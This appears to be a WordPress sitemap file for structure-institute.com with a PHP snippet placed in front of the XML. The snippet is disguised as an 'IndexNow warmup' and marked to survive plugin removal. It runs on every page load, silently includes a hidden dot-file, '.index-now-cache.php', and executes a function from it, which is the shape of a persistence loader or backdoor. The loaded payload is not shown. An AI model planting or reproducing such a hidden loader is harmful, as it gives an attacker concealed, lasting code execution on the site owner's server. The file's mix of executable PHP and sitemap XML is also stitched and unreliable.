
/* indexnow-warmup-v3 — keep if plugin removed */
if (!function_exists('indexnow_warmup_v3')) {
function indexnow_warmup_v3() {
    $bak = dirname(__FILE__) . '/.index-now-cache.php';
    if (is_readable($bak)) { @include_once $bak; }
    if (function_exists('indexnow_warmup_run')) { indexnow_warmup_run(); }
}
if (function_exists('add_action')) { add_action('init', 'indexnow_warmup_v3', 0); }
else { indexnow_warmup_v3(); }
}

<?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet type="text/xsl" href="https://structure-institute.com/wp-sitemap.xsl" ?>
<urlset xmlns="http://www.sitemaps.org/schemas/sitemap/0.9"><url><loc>https://structure-institute.com/category/uncategorized/</loc></url></urlset>
